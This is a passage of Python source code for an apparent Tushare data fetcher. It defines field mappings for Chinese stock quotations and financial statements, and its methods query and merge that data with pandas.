'ordered': [
'ts_code', 'name', 'cnspell', 'exchange', "market", 'area', 'industry',
'list_status', 'list_date', 'delist_date', 'is_hs']
},
'INDICES_DAILY': {
'raw': 'ts_code,trade_date,open,close,low,high,vol',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'vol']
},
'INDICES_WEEKLY': {
'raw': 'ts_code,trade_date,open,close,low,high,vol',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'vol']
},
'INDICES_MONTHLY': {
'raw': 'ts_code,trade_date,open,close,low,high,vol',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'vol']
},
'QUOTATIONS_DAILY': {
'raw': 'ts_code,trade_date,open,close,low,high,pre_close,change,vol,amount',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'pre_close', 'change', 'vol', 'amount']
},
'STOCK_INDICATORS_DAILY': {
'raw': 'ts_code,trade_date,total_share,float_share,free_share',
'ordered': ['ts_code','trade_date','total_share','float_share','free_share']
},
'QUOTATIONS_WEEKLY': {
'raw': 'ts_code,trade_date,open,close,low,high,pre_close,change,vol,amount',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'pre_close', 'change', 'vol', 'amount']
},
'QUOTATIONS_MONTHLY': {
'raw': 'ts_code,trade_date,open,close,low,high,pre_close,change,vol,amount',
'ordered': ['ts_code', 'trade_date', 'open', 'close', 'low', 'high', 'pre_close', 'change', 'vol', 'amount']
},
'LIMITS_STATISTIC': {
'raw': 'trade_date,ts_code,fd_amount,first_time,last_time,open_times,limit',
'ordered': ['ts_code', 'trade_date', 'limit', 'first_time', 'last_time', 'open_times', 'fd_amount']
},
'ADJ_FACTORS': {
'raw': 'trade_date,ts_code,adj_factor',
'ordered': ['ts_code', 'trade_date', 'adj_factor']
},
'INCOME_STATEMENTS': {
'raw': 'ts_code,ann_date,f_ann_date,end_date,report_type,comp_type,end_type,basic_eps,diluted_eps,total_revenue,revenue,int_income,prem_earned,comm_income,n_commis_income,n_oth_income,n_oth_b_income,prem_income,out_prem,une_prem_reser,reins_income,n_sec_tb_income,n_sec_uw_income,n_asset_mg_income,oth_b_income,fv_value_chg_gain,invest_income,ass_invest_income,forex_gain,total_cogs,oper_cost,int_exp,comm_exp,biz_tax_surchg,sell_exp,admin_exp,fin_exp,assets_impair_loss,prem_refund,compens_payout,reser_insur_liab,div_payt,reins_exp,oper_exp,compens_payout_refu,insur_reser_refu,reins_cost_refund,other_bus_cost,operate_profit,non_oper_income,non_oper_exp,nca_disploss,total_profit,income_tax,n_income,n_income_attr_p,minority_gain,oth_compr_income,t_compr_income,compr_inc_attr_p,compr_inc_attr_m_s,ebit,ebitda,insurance_exp,undist_profit,distable_profit,rd_exp,fin_exp_int_exp,fin_exp_int_inc,transfer_surplus_rese,transfer_housing_imprest,transfer_oth,adj_lossgain,withdra_legal_surplus,withdra_legal_pubfund,withdra_biz_devfund,withdra_rese_fund,withdra_oth_ersu,workers_welfare,distr_profit_shrhder,prfshare_payable_dvd,comshare_payable_dvd,capit_comstock_div,net_after_nr_lp_correct,credit_impa_loss,net_expo_hedging_benefits,oth_impair_loss_assets,total_opcost,amodcost_fin_assets,oth_income,asset_disp_income,continued_net_profit,end_net_profit',
'ordered': ['ts_code', 'ann_date', 'f_ann_date', 'end_date', 'report_type', 'comp_type', 'end_type', 'basic_eps', 'diluted_eps', 'total_revenue', 'revenue', 'int_income', 'prem_earned', 'comm_income', 'n_commis_income', 'n_oth_income', 'n_oth_b_income', 'prem_income', 'out_prem', 'une_prem_reser', 'reins_income', 'n_sec_tb_income', 'n_sec_uw_income', 'n_asset_mg_income', 'oth_b_income', 'fv_value_chg_gain', 'invest_income', 'ass_invest_income', 'forex_gain', 'total_cogs', 'oper_cost', 'int_exp', 'comm_exp', 'biz_tax_surchg', 'sell_exp', 'admin_exp', 'fin_exp', 'assets_impair_loss', 'prem_refund', 'compens_payout', 'reser_insur_liab', 'div_payt', 'reins_exp', 'oper_exp', 'compens_payout_refu', 'insur_reser_refu', 'reins_cost_refund', 'other_bus_cost', 'operate_profit', 'non_oper_income', 'non_oper_exp', 'nca_disploss', 'total_profit', 'income_tax', 'n_income', 'n_income_attr_p', 'minority_gain', 'oth_compr_income', 't_compr_income', 'compr_inc_attr_p', 'compr_inc_attr_m_s', 'ebit', 'ebitda', 'insurance_exp', 'undist_profit', 'distable_profit', 'rd_exp', 'fin_exp_int_exp', 'fin_exp_int_inc', 'transfer_surplus_rese', 'transfer_housing_imprest', 'transfer_oth', 'adj_lossgain', 'withdra_legal_surplus', 'withdra_legal_pubfund', 'withdra_biz_devfund', 'withdra_rese_fund', 'withdra_oth_ersu', 'workers_welfare', 'distr_profit_shrhder', 'prfshare_payable_dvd', 'comshare_payable_dvd', 'capit_comstock_div', 'net_after_nr_lp_correct', 'credit_impa_loss', 'net_expo_hedging_benefits', 'oth_impair_loss_assets', 'total_opcost', 'amodcost_fin_assets', 'oth_income', 'asset_disp_income', 'continued_net_profit', 'end_net_profit']
},
'BALANCE_SHEETS':{
'raw': 'ts_code,ann_date,f_ann_date,end_date,report_type,comp_type,end_type,total_share,cap_rese,undistr_porfit,surplus_rese,special_rese,money_cap,trad_asset,notes_receiv,accounts_receiv,oth_receiv,prepayment,div_receiv,int_receiv,inventories,amor_exp,nca_within_1y,sett_rsrv,loanto_oth_bank_fi,premium_receiv,reinsur_receiv,reinsur_res_receiv,pur_resale_fa,oth_cur_assets,total_cur_assets,fa_avail_for_sale,htm_invest,lt_eqt_invest,invest_real_estate,time_deposits,oth_assets,lt_rec,fix_assets,cip,const_materials,fixed_assets_disp,produc_bio_assets,oil_and_gas_assets,intan_assets,r_and_d,goodwill,lt_amor_exp,defer_tax_assets,decr_in_disbur,oth_nca,total_nca,cash_reser_cb,depos_in_oth_bfi,prec_metals,deriv_assets,rr_reins_une_prem,rr_reins_outstd_cla,rr_reins_lins_liab,rr_reins_lthins_liab,refund_depos,ph_pledge_loans,refund_cap_depos,indep_acct_assets,client_depos,client_prov,transac_seat_fee,invest_as_receiv,total_assets,lt_borr,st_borr,cb_borr,depos_ib_deposits,loan_oth_bank,trading_fl,notes_payable,acct_payable,adv_receipts,sold_for_repur_fa,comm_payable,payroll_payable,taxes_payable,int_payable,div_payable,oth_payable,acc_exp,deferred_inc,st_bonds_payable,payable_to_reinsurer,rsrv_insur_cont,acting_trading_sec,acting_uw_sec,non_cur_liab_due_1y,oth_cur_liab,total_cur_liab,bond_payable,lt_payable,specific_payables,estimated_liab,defer_tax_liab,defer_inc_non_cur_liab,oth_ncl,total_ncl,depos_oth_bfi,deriv_liab,depos,agency_bus_liab,oth_liab,prem_receiv_adva,depos_received,ph_invest,reser_une_prem,reser_outstd_claims,reser_lins_liab,reser_lthins_liab,indept_acc_liab,pledge_borr,indem_payable,policy_div_payable,total_liab,treasury_share,ordin_risk_reser,forex_differ,invest_loss_unconf,minority_int,total_hldr_eqy_exc_min_int,total_hldr_eqy_inc_min_int,total_liab_hldr_eqy,lt_payroll_payable,oth_comp_income,oth_eqt_tools,oth_eqt_tools_p_shr,lending_funds,acc_receivable,st_fin_payable,payables,hfs_assets,hfs_sales,cost_fin_assets,fair_value_fin_assets,cip_total,oth_pay_total,long_pay_total,debt_invest,oth_debt_invest,oth_eq_invest,oth_illiq_fin_assets,oth_eq_ppbond,receiv_financing,use_right_assets,lease_liab,contract_assets,contract_liab,accounts_receiv_bill,accounts_pay,oth_rcv_total,fix_assets_total',
'ordered': ['ts_code', 'ann_date', 'f_ann_date', 'end_date', 'report_type', 'comp_type', 'end_type', 'total_share', 'cap_rese', 'undistr_porfit', 'surplus_rese', 'special_rese', 'money_cap', 'trad_asset', 'notes_receiv', 'accounts_receiv', 'oth_receiv', 'prepayment', 'div_receiv', 'int_receiv', 'inventories', 'amor_exp', 'nca_within_1y', 'sett_rsrv', 'loanto_oth_bank_fi', 'premium_receiv', 'reinsur_receiv', 'reinsur_res_receiv', 'pur_resale_fa', 'oth_cur_assets', 'total_cur_assets', 'fa_avail_for_sale', 'htm_invest', 'lt_eqt_invest', 'invest_real_estate', 'time_deposits', 'oth_assets', 'lt_rec', 'fix_assets', 'cip', 'const_materials', 'fixed_assets_disp', 'produc_bio_assets', 'oil_and_gas_assets', 'intan_assets', 'r_and_d', 'goodwill', 'lt_amor_exp', 'defer_tax_assets', 'decr_in_disbur', 'oth_nca', 'total_nca', 'cash_reser_cb', 'depos_in_oth_bfi', 'prec_metals', 'deriv_assets', 'rr_reins_une_prem', 'rr_reins_outstd_cla', 'rr_reins_lins_liab', 'rr_reins_lthins_liab', 'refund_depos', 'ph_pledge_loans', 'refund_cap_depos', 'indep_acct_assets', 'client_depos', 'client_prov', 'transac_seat_fee', 'invest_as_receiv', 'total_assets', 'lt_borr', 'st_borr', 'cb_borr', 'depos_ib_deposits', 'loan_oth_bank', 'trading_fl', 'notes_payable', 'acct_payable', 'adv_receipts', 'sold_for_repur_fa', 'comm_payable', 'payroll_payable', 'taxes_payable', 'int_payable', 'div_payable', 'oth_payable', 'acc_exp', 'deferred_inc', 'st_bonds_payable', 'payable_to_reinsurer', 'rsrv_insur_cont', 'acting_trading_sec', 'acting_uw_sec', 'non_cur_liab_due_1y', 'oth_cur_liab', 'total_cur_liab', 'bond_payable', 'lt_payable', 'specific_payables', 'estimated_liab', 'defer_tax_liab', 'defer_inc_non_cur_liab', 'oth_ncl', 'total_ncl', 'depos_oth_bfi', 'deriv_liab', 'depos', 'agency_bus_liab', 'oth_liab', 'prem_receiv_adva', 'depos_received', 'ph_invest', 'reser_une_prem', 'reser_outstd_claims', 'reser_lins_liab', 'reser_lthins_liab', 'indept_acc_liab', 'pledge_borr', 'indem_payable', 'policy_div_payable', 'total_liab', 'treasury_share', 'ordin_risk_reser', 'forex_differ', 'invest_loss_unconf', 'minority_int', 'total_hldr_eqy_exc_min_int', 'total_hldr_eqy_inc_min_int', 'total_liab_hldr_eqy', 'lt_payroll_payable', 'oth_comp_income', 'oth_eqt_tools', 'oth_eqt_tools_p_shr', 'lending_funds', 'acc_receivable', 'st_fin_payable', 'payables', 'hfs_assets', 'hfs_sales', 'cost_fin_assets', 'fair_value_fin_assets', 'cip_total', 'oth_pay_total', 'long_pay_total', 'debt_invest', 'oth_debt_invest', 'oth_eq_invest', 'oth_illiq_fin_assets', 'oth_eq_ppbond', 'receiv_financing', 'use_right_assets', 'lease_liab', 'contract_assets', 'contract_liab', 'accounts_receiv_bill', 'accounts_pay', 'oth_rcv_total', 'fix_assets_total']
},
'STATEMENTS_OF_CASH_FLOWS':{
'raw': 'ts_code,ann_date,f_ann_date,end_date,report_type,comp_type,end_type,net_profit,finan_exp,c_fr_sale_sg,recp_tax_rends,n_depos_incr_fi,n_incr_loans_cb,n_inc_borr_oth_fi,prem_fr_orig_contr,n_incr_insured_dep,n_reinsur_prem,n_incr_disp_tfa,ifc_cash_incr,n_incr_disp_faas,n_incr_loans_oth_bank,n_cap_incr_repur,c_fr_oth_operate_a,c_inf_fr_operate_a,c_paid_goods_s,c_paid_to_for_empl,c_paid_for_taxes,n_incr_clt_loan_adv,n_incr_dep_cbob,c_pay_claims_orig_inco,pay_handling_chrg,pay_comm_insur_plcy,oth_cash_pay_oper_act,st_cash_out_act,n_cashflow_act,oth_recp_ral_inv_act,c_disp_withdrwl_invest,c_recp_return_invest,n_recp_disp_fiolta,n_recp_disp_sobu,stot_inflows_inv_act,c_pay_acq_const_fiolta,c_paid_invest,n_disp_subs_oth_biz,oth_pay_ral_inv_act,n_incr_pledge_loan,stot_out_inv_act,n_cashflow_inv_act,c_recp_borrow,proc_issue_bonds,oth_cash_recp_ral_fnc_act,stot_cash_in_fnc_act,free_cashflow,c_prepay_amt_borr,c_pay_dist_dpcp_int_exp,incl_dvd_profit_paid_sc_ms,oth_cashpay_ral_fnc_act,stot_cashout_fnc_act,n_cash_flows_fnc_act,eff_fx_flu_cash,n_incr_cash_cash_equ,c_cash_equ_beg_period,c_cash_equ_end_period,c_recp_cap_contrib,incl_cash_rec_saims,uncon_invest_loss,prov_depr_assets,depr_fa_coga_dpba,amort_intang_assets,lt_amort_deferred_exp,decr_deferred_exp,incr_acc_exp,loss_disp_fiolta,loss_scr_fa,loss_fv_chg,invest_loss,decr_def_inc_tax_assets,incr_def_inc_tax_liab,decr_inventories,decr_oper_payable,incr_oper_payable,others,im_net_cashflow_oper_act,conv_debt_into_cap,conv_copbonds_due_within_1y,fa_fnc_leases,im_n_incr_cash_equ,net_dism_capital_add,net_cash_rece_sec,credit_impa_loss,use_right_asset_dep,oth_loss_asset,end_bal_cash,beg_bal_cash,end_bal_cash_equ,beg_bal_cash_equ',
'ordered': ['ts_code', 'ann_date', 'f_ann_date', 'end_date', 'report_type', 'comp_type', 'end_type', 'net_profit', 'finan_exp', 'c_fr_sale_sg', 'recp_tax_rends', 'n_depos_incr_fi', 'n_incr_loans_cb', 'n_inc_borr_oth_fi', 'prem_fr_orig_contr', 'n_incr_insured_dep', 'n_reinsur_prem', 'n_incr_disp_tfa', 'ifc_cash_incr', 'n_incr_disp_faas', 'n_incr_loans_oth_bank', 'n_cap_incr_repur', 'c_fr_oth_operate_a', 'c_inf_fr_operate_a', 'c_paid_goods_s', 'c_paid_to_for_empl', 'c_paid_for_taxes', 'n_incr_clt_loan_adv', 'n_incr_dep_cbob', 'c_pay_claims_orig_inco', 'pay_handling_chrg', 'pay_comm_insur_plcy', 'oth_cash_pay_oper_act', 'st_cash_out_act', 'n_cashflow_act', 'oth_recp_ral_inv_act', 'c_disp_withdrwl_invest', 'c_recp_return_invest', 'n_recp_disp_fiolta', 'n_recp_disp_sobu', 'stot_inflows_inv_act', 'c_pay_acq_const_fiolta', 'c_paid_invest', 'n_disp_subs_oth_biz', 'oth_pay_ral_inv_act', 'n_incr_pledge_loan', 'stot_out_inv_act', 'n_cashflow_inv_act', 'c_recp_borrow', 'proc_issue_bonds', 'oth_cash_recp_ral_fnc_act', 'stot_cash_in_fnc_act', 'free_cashflow', 'c_prepay_amt_borr', 'c_pay_dist_dpcp_int_exp', 'incl_dvd_profit_paid_sc_ms', 'oth_cashpay_ral_fnc_act', 'stot_cashout_fnc_act', 'n_cash_flows_fnc_act', 'eff_fx_flu_cash', 'n_incr_cash_cash_equ', 'c_cash_equ_beg_period', 'c_cash_equ_end_period', 'c_recp_cap_contrib', 'incl_cash_rec_saims', 'uncon_invest_loss', 'prov_depr_assets', 'depr_fa_coga_dpba', 'amort_intang_assets', 'lt_amort_deferred_exp', 'decr_deferred_exp', 'incr_acc_exp', 'loss_disp_fiolta', 'loss_scr_fa', 'loss_fv_chg', 'invest_loss', 'decr_def_inc_tax_assets', 'incr_def_inc_tax_liab', 'decr_inventories', 'decr_oper_payable', 'incr_oper_payable', 'others', 'im_net_cashflow_oper_act', 'conv_debt_into_cap', 'conv_copbonds_due_within_1y', 'fa_fnc_leases', 'im_n_incr_cash_equ', 'net_dism_capital_add', 'net_cash_rece_sec', 'credit_impa_loss', 'use_right_asset_dep', 'oth_loss_asset', 'end_bal_cash', 'beg_bal_cash', 'end_bal_cash_equ', 'beg_bal_cash_equ']
},
'INCOME_FORECASTS':{
'raw': 'ts_code,ann_date,end_date,type,p_change_min,p_change_max,net_profit_min,net_profit_max,last_parent_net,first_ann_date,summary,change_reason',
'ordered': ['ts_code', 'ann_date', 'end_date', 'type', 'p_change_min', 'p_change_max', 'net_profit_min', 'net_profit_max', 'last_parent_net', 'first_ann_date', 'summary', 'change_reason']
},
'FINANCIAL_INDICATORS':{
'raw': 'ts_code,ann_date,end_date,eps,dt_eps,total_revenue_ps,revenue_ps,capital_rese_ps,surplus_rese_ps,undist_profit_ps,extra_item,profit_dedt,gross_margin,current_ratio,quick_ratio,cash_ratio,invturn_days,arturn_days,inv_turn,ar_turn,ca_turn,fa_turn,assets_turn,op_income,valuechange_income,interst_income,daa,ebit,ebitda,fcff,fcfe,current_exint,noncurrent_exint,interestdebt,netdebt,tangible_asset,working_capital,networking_capital,invest_capital,retained_earnings,diluted2_eps,bps,ocfps,retainedps,cfps,ebit_ps,fcff_ps,fcfe_ps,netprofit_margin,grossprofit_margin,cogs_of_sales,expense_of_sales,profit_to_gr,saleexp_to_gr,adminexp_of_gr,finaexp_of_gr,impai_ttm,gc_of_gr,op_of_gr,ebit_of_gr,roe,roe_waa,roe_dt,roa,npta,roic,roe_yearly,roa2_yearly,roe_avg,opincome_of_ebt,investincome_of_ebt,n_op_profit_of_ebt,tax_to_ebt,dtprofit_to_profit,salescash_to_or,ocf_to_or,ocf_to_opincome,capitalized_to_da,debt_to_assets,assets_to_eqt,dp_assets_to_eqt,ca_to_assets,nca_to_assets,tbassets_to_totalassets,int_to_talcap,eqt_to_talcapital,currentdebt_to_debt,longdeb_to_debt,ocf_to_shortdebt,debt_to_eqt,eqt_to_debt,eqt_to_interestdebt,tangibleasset_to_debt,tangasset_to_intdebt,tangibleasset_to_netdebt,ocf_to_debt,ocf_to_interestdebt,ocf_to_netdebt,ebit_to_interest,longdebt_to_workingcapital,ebitda_to_debt,turn_days,roa_yearly,roa_dp,fixed_assets,profit_prefin_exp,non_op_profit,op_to_ebt,nop_to_ebt,ocf_to_profit,cash_to_liqdebt,cash_to_liqdebt_withinterest,op_to_liqdebt,op_to_debt,roic_yearly,total_fa_trun,profit_to_op,q_opincome,q_investincome,q_dtprofit,q_eps,q_netprofit_margin,q_gsprofit_margin,q_exp_to_sales,q_profit_to_gr,q_saleexp_to_gr,q_adminexp_to_gr,q_finaexp_to_gr,q_impair_to_gr_ttm,q_gc_to_gr,q_op_to_gr,q_roe,q_dt_roe,q_npta,q_opincome_to_ebt,q_investincome_to_ebt,q_dtprofit_to_profit,q_salescash_to_or,q_ocf_to_sales,q_ocf_to_or,basic_eps_yoy,dt_eps_yoy,cfps_yoy,op_yoy,ebt_yoy,netprofit_yoy,dt_netprofit_yoy,ocf_yoy,roe_yoy,bps_yoy,assets_yoy,eqt_yoy,tr_yoy,or_yoy,q_gr_yoy,q_gr_qoq,q_sales_yoy,q_sales_qoq,q_op_yoy,q_op_qoq,q_profit_yoy,q_profit_qoq,q_netprofit_yoy,q_netprofit_qoq,equity_yoy,rd_exp',
'ordered': ['ts_code', 'ann_date', 'end_date', 'eps', 'dt_eps', 'total_revenue_ps', 'revenue_ps', 'capital_rese_ps', 'surplus_rese_ps', 'undist_profit_ps', 'extra_item', 'profit_dedt', 'gross_margin', 'current_ratio', 'quick_ratio', 'cash_ratio', 'invturn_days', 'arturn_days', 'inv_turn', 'ar_turn', 'ca_turn', 'fa_turn', 'assets_turn', 'op_income', 'valuechange_income', 'interst_income', 'daa', 'ebit', 'ebitda', 'fcff', 'fcfe', 'current_exint', 'noncurrent_exint', 'interestdebt', 'netdebt', 'tangible_asset', 'working_capital', 'networking_capital', 'invest_capital', 'retained_earnings', 'diluted2_eps', 'bps', 'ocfps', 'retainedps', 'cfps', 'ebit_ps', 'fcff_ps', 'fcfe_ps', 'netprofit_margin', 'grossprofit_margin', 'cogs_of_sales', 'expense_of_sales', 'profit_to_gr', 'saleexp_to_gr', 'adminexp_of_gr', 'finaexp_of_gr', 'impai_ttm', 'gc_of_gr', 'op_of_gr', 'ebit_of_gr', 'roe', 'roe_waa', 'roe_dt', 'roa', 'npta', 'roic', 'roe_yearly', 'roa2_yearly', 'roe_avg', 'opincome_of_ebt', 'investincome_of_ebt', 'n_op_profit_of_ebt', 'tax_to_ebt', 'dtprofit_to_profit', 'salescash_to_or', 'ocf_to_or', 'ocf_to_opincome', 'capitalized_to_da', 'debt_to_assets', 'assets_to_eqt', 'dp_assets_to_eqt', 'ca_to_assets', 'nca_to_assets', 'tbassets_to_totalassets', 'int_to_talcap', 'eqt_to_talcapital', 'currentdebt_to_debt', 'longdeb_to_debt', 'ocf_to_shortdebt', 'debt_to_eqt', 'eqt_to_debt', 'eqt_to_interestdebt', 'tangibleasset_to_debt', 'tangasset_to_intdebt', 'tangibleasset_to_netdebt', 'ocf_to_debt', 'ocf_to_interestdebt', 'ocf_to_netdebt', 'ebit_to_interest', 'longdebt_to_workingcapital', 'ebitda_to_debt', 'turn_days', 'roa_yearly', 'roa_dp', 'fixed_assets', 'profit_prefin_exp', 'non_op_profit', 'op_to_ebt', 'nop_to_ebt', 'ocf_to_profit', 'cash_to_liqdebt', 'cash_to_liqdebt_withinterest', 'op_to_liqdebt', 'op_to_debt', 'roic_yearly', 'total_fa_trun', 'profit_to_op', 'q_opincome', 'q_investincome', 'q_dtprofit', 'q_eps', 'q_netprofit_margin', 'q_gsprofit_margin', 'q_exp_to_sales', 'q_profit_to_gr', 'q_saleexp_to_gr', 'q_adminexp_to_gr', 'q_finaexp_to_gr', 'q_impair_to_gr_ttm', 'q_gc_to_gr', 'q_op_to_gr', 'q_roe', 'q_dt_roe', 'q_npta', 'q_opincome_to_ebt', 'q_investincome_to_ebt', 'q_dtprofit_to_profit', 'q_salescash_to_or', 'q_ocf_to_sales', 'q_ocf_to_or', 'basic_eps_yoy', 'dt_eps_yoy', 'cfps_yoy', 'op_yoy', 'ebt_yoy', 'netprofit_yoy', 'dt_netprofit_yoy', 'ocf_yoy', 'roe_yoy', 'bps_yoy', 'assets_yoy', 'eqt_yoy', 'tr_yoy', 'or_yoy', 'q_gr_yoy', 'q_gr_qoq', 'q_sales_yoy', 'q_sales_qoq', 'q_op_yoy', 'q_op_qoq', 'q_profit_yoy', 'q_profit_qoq', 'q_netprofit_yoy', 'q_netprofit_qoq', 'equity_yoy', 'rd_exp']
},
}
def _get_fields(self, table_name):
return self.fields[table_name]['raw']
def _change_order(self, table_name, dataframe):
cols = self.fields[table_name]['ordered']
dataframe = dataframe[cols]
return dataframe
@staticmethod
def _trim_date_list(date_list, start_date):
return date_list[date_list > start_date]
# def get_index_list(self):
# table_name = 'INDEX_LIST'
# fields = self._get_fields(table_name)
# data = self._change_order(table_name, pd.concat([
# self.query('index_basic', market='SSE', fields=fields),
# self.query('index_basic', market='SZSE', fields=fields),
# self.query('index_basic', market='MSCI', fields=fields),
# self.query('index_basic', market='CSI', fields=fields),
# self.query('index_basic', market='CICC', fields=fields),
# self.query('index_basic', market='SW', fields=fields),
# self.query('index_basic', market='OTH', fields=fields)
# ], axis=0).reset_index(drop=True).fillna('NULL'))
# return self.convert_header(table_name, data)
def get_stock_list(self, fill_controller):
table_name = 'STOCK_LIST'
fields = self._get_fields(table_name)
data = self._change_order(table_name, pd.concat([
self.query('stock_basic', exchange='SSE',
list_status='L', fields=fields),
self.query('stock_basic', exchange='SSE',
list_status='P', fields=fields),
self.query('stock_basic', exchange='SSE',
list_status='D', fields=fields),
self.query('stock_basic', exchange='SZSE',
list_status='L', fields=fields),
self.query('stock_basic', exchange='SZSE',
list_status='P', fields=fields),
self.query('stock_basic', exchange='SZSE',
list_status='D', fields=fields)
], axis=0).reset_index(drop=True).fillna('NULL'))
data = data.replace({"中小板": "主板"})
self.stock_list = data['ts_code']
return self.convert_header(table_name, data)
def _get_indices(self, table_name, frequency='daily'):
fields = self._get_fields(table_name)
data = self._change_order(table_name, pd.concat([
self.query(f'index_{frequency}',
ts_code='000001.SH', fields=fields).iloc[::-1],
self.query(f'index_{frequency}',
ts_code='399001.SZ', fields=fields).iloc[::-1]
], axis=0).reset_index(drop=True).fillna('NULL'))
self.trade_date_list[frequency] = data['trade_date']
data = self.convert_header(table_name, data)
return data
def get_indices_daily(self, fill_controller):
return self._get_indices('INDICES_DAILY')
def get_indices_weekly(self, fill_controller):
return self._get_indices('INDICES_WEEKLY', 'weekly')
def get_indices_monthly(self, fill_controller):
return self._get_indices('INDICES_MONTHLY', 'monthly')
def _get_quotations(self, table_name, fill_controller, frequency='daily'):
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list[frequency]
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query(
frequency, trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = self._change_order(
table_name, data.reset_index(drop=True).fillna('NULL'))
data = self.convert_header(table_name, data)
return data
def get_quotations_daily(self, fill_controller):
return self._get_quotations('QUOTATIONS_DAILY', fill_controller)
def get_quotations_weekly(self, fill_controller):
return self._get_quotations('QUOTATIONS_WEEKLY', fill_controller, 'weekly')
def get_quotations_monthly(self, fill_controller):
return self._get_quotations('QUOTATIONS_MONTHLY', fill_controller, 'monthly')
def get_stock_indicators_daily(self, fill_controller):
table_name = 'STOCK_INDICATORS_DAILY'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list['daily']
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("daily_basic", trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
else:
for stock in pb(self.stock_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query("daily_basic", ts_code=stock,fields=fields).reset_index(drop=True).fillna('NULL')
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = self._change_order(table_name, data)
data = self.convert_header(table_name, data)
return data
def get_limits_statistic(self, fill_controller):
table_name = 'LIMITS_STATISTIC'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list['daily']
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query(
'limit_list', trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = data.reset_index(drop=True).fillna('NULL')
data = self._change_order(table_name, data)
data = self.convert_header(table_name, data)
return data
def get_adj_factors(self, fill_controller):
table_name = 'ADJ_FACTORS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
trade_date_list = self.trade_date_list['daily']
if len(fill_controller) > 0:
trade_date_list = self._trim_date_list(trade_date_list, fill_controller['latest_date'])
if len(trade_date_list) == 0:
return
for trade_date in pb(trade_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self.query(
'adj_factor', ts_code='', trade_date=trade_date, fields=fields)
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
data = data.reset_index(drop=True).fillna('NULL')
data = self._change_order(table_name, data)
data = self.convert_header(table_name, data)
return data
def get_income_statements(self, fill_controller):
table_name = 'INCOME_STATEMENTS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self._change_order(table_name, pd.concat([
self.query("income_vip", period=date,
report_type=1, fields=fields),
self.query("income_vip", period=date,
report_type=2, fields=fields),
self.query("income_vip", period=date,
report_type=3, fields=fields),
self.query("income_vip", period=date,
report_type=4, fields=fields),
self.query("income_vip", period=date,
report_type=5, fields=fields),
self.query("income_vip", period=date,
report_type=6, fields=fields),
self.query("income_vip", period=date,
report_type=7, fields=fields),
self.query("income_vip", period=date,
report_type=8, fields=fields),
self.query("income_vip", period=date,
report_type=9, fields=fields),
self.query("income_vip", period=date,
report_type=10, fields=fields),
self.query("income_vip", period=date,
report_type=11, fields=fields),
self.query("income_vip", period=date,
report_type=12, fields=fields)
], axis=0).reset_index(drop=True).fillna('NULL'))
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_balance_sheets(self, fill_controller):
table_name = 'BALANCE_SHEETS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
end_date_list = self._trim_date_list(end_date_list, fill_controller['latest_date'])
if len(end_date_list) == 0:
return
for date in pb(end_date_list, desc='长任务,请等待', colour='#ffffff'):
next_data = None
while True:
try:
next_data = self._change_order(table_name, pd.concat([
self.query("balancesheet_vip", period=date,
report_type=1, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=2, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=3, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=4, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=5, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=6, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=7, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=8, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=9, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=10, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=11, fields=fields),
self.query("balancesheet_vip", period=date,
report_type=12, fields=fields)
], axis=0).reset_index(drop=True).fillna('NULL'))
break
except Exception:
continue
data = pd.concat([data, next_data], axis=0)
return data
def get_cash_flows(self, fill_controller):
table_name = 'STATEMENTS_OF_CASH_FLOWS'
fields = self._get_fields(table_name)
data = pd.DataFrame(columns=fields.split(','))
end_date_list = date_getter.get_quarter_end_date_list()['TRADE_DATE']
if len(fill_controller) > 0:
